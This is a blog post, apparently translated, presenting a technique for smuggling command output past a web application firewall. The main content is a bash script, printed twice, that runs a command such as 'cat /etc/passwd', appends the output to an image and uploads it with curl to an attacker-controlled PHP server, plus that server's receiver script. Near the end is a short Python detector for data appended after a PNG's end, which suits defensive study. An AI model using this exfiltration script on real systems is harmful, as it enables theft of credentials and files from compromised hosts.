Everyone has already gone on holiday, so the public account's update pace naturally has to keep up. Today's post is a small command-execution trick.
In real engagements we often run into command execution vulnerabilities, but with WAFs everywhere, some commands get blocked the moment we try to run them. For example, executing cat /etc/passwd gets the keyword intercepted outright, so the command never runs. Something like the figure below.
The request is simply stopped by the WAF. If the target has outbound network access, we can use the method below to get around this. The principle is roughly as follows:
Have the target actively send a request to a PHP service we control, with the command output written into an image; we then open the image to read the result of the command execution.
The concrete steps are:
First we need a PHP file with the following content:
```php
<?php
$file = date("dHis") . ".png";
move_uploaded_file($_FILES['image']['tmp_name'], $file);
?>
```
We also need a script that performs the request and the command execution:
```bash
#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attacker's PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating from the device.
tmpImage="https://support.apple.com/content/dam/edam/applecare/images/en_US/repair/psp-repair_2x.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the user's home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
    # Curl will silently (-s) download the backup image and
    # save it (-o) into the /tmp directory with the i.jpg filename.
    curl -s "$tmpImage" -o "/tmp/i.jpg"
    # The backup image is set into the exfilImage variable for
    # later commands.
    exfilImage="/tmp/i.jpg"
else
    # If a suitable image is discovered, the exfilImage variable
    # is set for later commands.
    exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='1'

# An `if` statement to check the value of the useEncrypt
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
    # The command output is piped into OpenSSL, which encrypts (enc)
    # it and base64-encodes (-a -A) the result with the password
    # (-pass). The original line used `-in` with no file name,
    # which does not run; piping the output is the fix.
    exfilData="$(eval $exfilData | openssl enc -aes-256-cbc -a -A -pass pass:"$pass")"
else
    # If encryption isn't used, Bash will evaluate the variable
    # and execute it as a command.
    exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into the
# image. It will append (>>) the data after a blank line (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attacker's PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"
```
Then we set exfilData to the command we want to run, exfilSite to the address of your PHP site, and tmpImage to the URL of any image (here I just use an image from Baidu). useEncrypt decides whether the output is encrypted: 1 encrypts it with the password defined above, 0 sends it unencrypted.
After the changes:
```bash
#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# This is the command being executed and embedded in the photo.
# Single-quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='cat /etc/passwd'

# Where the attacker's PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://192.168.0.107/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already on the MacBook to
# minimize the amount of traffic originating from the device.
tmpImage="https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png"

# The `find` command used to locate a suitable image to embed
# data into. It will check the user's home (~) directory for the
# first (-print -quit) JPG, JPEG, or PNG smaller than 100k.
# The filesize maximum and filetypes are somewhat arbitrary.
# The size can be increased and the filetypes can be expanded
# to use MP3, PDF, and MOV files, for example.
findImage="$(find ~ -type f -size -100k \( -iname '*.jp*g' -o -iname '*.png' \) -print -quit)"

# If the encryption option is enabled, the password is hardcoded
# into the payload for convenience, making it possible to
# reverse engineer and decrypt the exfiltrated data inside the
# image. This is a quick and dirty solution.
pass="password123"

# An `if` statement to detect if a suitable PNG or JPG was
# discovered. If not, it will download the backup image
# defined earlier in the script (tmpImage).
if [[ ! -f "$findImage" ]]; then
    # Curl will silently (-s) download the backup image and
    # save it (-o) into the /tmp directory with the i.jpg filename.
    curl -s "$tmpImage" -o "/tmp/i.jpg"
    # The backup image is set into the exfilImage variable for
    # later commands.
    exfilImage="/tmp/i.jpg"
else
    # If a suitable image is discovered, the exfilImage variable
    # is set for later commands.
    exfilImage="$findImage"
fi

# It may or may not be desirable to encrypt the payload output
# before embedding it into the image. Set to `1` to enable
# encryption, set to `0` to disable it.
useEncrypt='0'

# An `if` statement to check the value of the useEncrypt
# variable. If `1` it will encrypt with openssl (LibreSSL).
# Otherwise, it will not encrypt.
if [[ "$useEncrypt" = '1' ]]; then
    # The command output is piped into OpenSSL, which encrypts (enc)
    # it and base64-encodes (-a -A) the result with the password
    # (-pass). The original line used `-in` with no file name,
    # which does not run; piping the output is the fix.
    exfilData="$(eval $exfilData | openssl enc -aes-256-cbc -a -A -pass pass:"$pass")"
else
    # If encryption isn't used, Bash will evaluate the variable
    # and execute it as a command.
    exfilData="$(eval $exfilData)"
fi

# Printf is used to embed the command output directly into the
# image. It will append (>>) the data after a blank line (\n\n).
# The newlines make it easy to quickly extract the data
# after it has been delivered to the attacker.
printf '\n\n%s' "$exfilData" >> "$exfilImage"

# Curl will exfiltrate the image to the attacker's PHP
# server.
curl -F "image=@$exfilImage" "$exfilSite"
```
Then start a web server:
Next, simulate the attacker running the script; the server receives the request:
The server writes the image to disk; opening it shows the command output:
Reference:
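Because the script simply appends `\n\n` plus the command output after the last byte of the image, the artifact a defender can look for is an image file carrying bytes past its structural end. The following added example (not part of this post or of the null-byte script) walks a PNG's chunk list, checks each chunk CRC, and returns whatever follows the IEND chunk; the minimal PNG and the appended text are constructed inline as sample input. It handles PNG only; JPEG needs a separate segment parser.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_end_offset(data: bytes) -> int:
    """Return the offset just past the IEND chunk of a well-formed PNG.

    Raises ValueError if the signature, a chunk CRC, or IEND is missing."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4  # header + payload + CRC
        if chunk_end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        stored_crc = struct.unpack(">I", data[chunk_end - 4:chunk_end])[0]
        if zlib.crc32(data[pos + 4:pos + 8 + length]) != stored_crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        pos = chunk_end
        if ctype == b"IEND":
            return pos
    raise ValueError("no IEND chunk found")


def trailing_data(data: bytes) -> bytes:
    """Bytes appended after IEND; empty for a clean file."""
    return data[png_end_offset(data):]


def make_png(width: int = 1, height: int = 1) -> bytes:
    """Build a minimal valid grayscale PNG (constructed test input)."""
    def chunk(ctype: bytes, payload: bytes) -> bytes:
        body = ctype + payload
        return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00" * width for _ in range(height))  # filter byte + pixels
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


CLEAN = make_png()
# Constructed sample mimicking the script's append: printf '\n\n%s' "$output" >> image
SMUGGLED = CLEAN + b"\n\nconstructed-command-output"

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("smuggled", SMUGGLED)):
        extra = trailing_data(blob)
        print(f"{name}: {len(extra)} trailing bytes" + (f" -> {extra.strip()!r}" if extra else ""))
```

The same check can run on a WAF or upload handler in front of the PHP receiver, or over stored images during an investigation, flagging any file whose trailing data is non-empty.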
https://null-byte.wonderhowto.com/how-to/hacking-macos-use-images-smuggle-data-through-firewalls-0197128/